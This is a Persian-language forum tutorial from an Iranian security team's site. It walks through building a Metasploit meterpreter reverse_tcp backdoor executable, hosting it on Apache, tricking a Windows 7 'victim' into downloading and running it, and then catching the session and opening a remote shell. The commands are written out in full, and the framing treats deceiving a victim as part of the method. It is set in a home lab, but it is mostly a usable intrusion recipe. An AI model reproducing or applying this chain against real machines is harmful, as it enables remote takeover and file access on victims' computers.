رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

با سلام ماهان نفوذی هستم :) خب بدون مقدمه بریم سراغ اموزش ;)

1.اول ویندوز کالی لینوکس خودتونو باز کنید

2.حالا متا اسپلویت را باز کنید . روش باز کردن :   وارد ترمینال شده و msfconsole را تایپ کرده و اینتر کنید . کمی صبر کنید تا متااسپلویت باز شود.

3.خب حالا که متا اسپلویت بالا اومد این عبارت را تایپ کنید :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 X > Desktop/Guardiran.exe

در این دستور آدرس آیپی 192.168.1.100 , آدرس آیپی سیستم کالی لینوکس بنده هست که من به صورت دستی آن را تعیین کرده ام . شما بایستی آدرس آیپی کالی خود را در این فرمان وارد کنید . اگر این آدرس را نمی دانید , با استفاده از دستور ifconfig درون خط فرمان این آیپی را بدست آورید و وارد دستور کنید .

4.حالا اگر دسکتاپ لینوکستونو ببینید متوجه ایجاد شدن فایلی به نام guardiran شده اید (نام اصلی این ابزار ایجاد شده بک دور به معنای در پشتی میباشد)

%D8%A8%DA%A9_%D8%AF%D9%88.png

 

5.ک خط فرمان جدید در کالی باز کنید (متا اسپلوییت را نبندید چون هنوز باهاش کار داریم) .
خوب حالا بایستی فایل بکدور را با ویندوز 7 به اشتراک بگذاریم به این منظور دستورات زیر را در خط فرمان وارد کنید . ابتدا با استفاده از دستور mkdir یک پوشه جدید با مسیر /var/www/share ایجاد می کنیم . سپس با استفاده از دستور chmod دسترسی این پوشه را به 755 تغییر می دهیم . سپس توسط دستور chown مالکیت پوشه را به www-data تغییر می دهیم تا توسط آپاچی قابل دسترسی باشد . در نهایت با استفاده از دستور ls -la تغییرات انجام شده را می بینیم .

 

up_n.png

 

6.. گام بعدی این است که سرویس آپاچی سرور را آغاز کنیم تا فایل از طریق این مسیر قابل دسترسی باشد :

up_n.png

 

7 . حالا برای اینکه فایل بکدور که در ابتدای درس ایجاد کردیم از طریق مسیر سرور آپاچی قابل دسترسی باشد , با استفاده از دستور cp آن را به مسیر /var/www/share/ کپی می کنیم

 

8. اکنون زمان آن رسیده که ویندوز 7 برویم و این فایل را دانلود کنید . در این حالت خودتان را به جای هکر یک قربانی فرض کنید که به هر شکل ممکنی گول خورده و این فایل را از طریق سرور دانلود می کند . به این منظور در ویندوز هفت یک مرورگر را باز کنید و به مسیر http://192.168.1.100/share/ بروید . بازهم لازم به ذکر است که این آدرس آیپی کالی لینوکس شماست و مسلما برای شما آدرس متفاوتی خواهد بود . ;)

lab-5-7-8.png

 

 

9.خب حالا این فایل بک دور را روی سیستم خود زخیره کنید

 

 

lab-5-7-9.png

 

 

10. به کالی لینوکس و ابزار متا اسپلوییت باز گردید . دستور use exploit/multi/handler را وارد کنید تا ماژول handler فعال شود . برای استفاده از TCP معکوس دستور set payload windows/meterpreter/reverse_tcp را وارد کنید . برای تعیین آدرس آیپی که کانکشن معکوس ما را خواهد گرفت دستور set lhost 192.168.1.100 را وارد کنید (آدرس آیپی کالی است و واسه شما متفاوت است) . برای آغاز به کار ماژول handler دستور exploit -j -z رو وارد بکنید :)

 

11. خوب یکبار دیگر به ویندوز هفت قربانی عزیز باز گردیم . این بار فرض کنید که قربانی فریب خورده و فایل بکدور (که قبلا دانلود کرده بود) را بر روی سیستم خود اجرا می کند . شما این کار را به صورت دستی نجام بدید ینی خودتون اجراش کنید...

 

12.به کالی و ابزار متا اسپلوییت بر گردید و ببینید که در آخر خط فرمان یک پیام جدید ظاهر شده که معنی آن این است که یک نشست جدید در داخل ماشین ویندوز 7 ما با آدرس آیپی 192.168.1.90 در زمان مربوطه آغاز گردیده است .

 

13.. خوب شما برای تعامل با این نشست باز شده کافی است دستور sessions -I 1 را وارد کنید . ملاحظه می کنید که پیامی می دهد که تعامل با نشست شماره یک آغاز شد .

 

14. حالا برای مثال برای دسترسی به خط فرمان ویندوز 7 و دسترسی به فایل ها و پوشه ها دستور Shell را وارد کنید . ملاحظه می کنید که ما هم اکنون وارد مسیر خط فرمان ویندوز 7 شده ایم و به سیستم ویندوز 7 نفوذ کرده و به فایل های آن دسترسی داریم .

 

15.. باور ندارید دستور dir را وارد کنید تا لیست فایل های موجود در پوشه فعلی را به شما نشان دهد . هاهاهاهاهاها

 

16. اینجوری بود که شما عزیزان این ویندوز سونو هک کردیـــد :) با تشکر ماهان (نفوذی)

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

مهمان
این موضوع برای عدم ارسال قفل گردیده است.

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...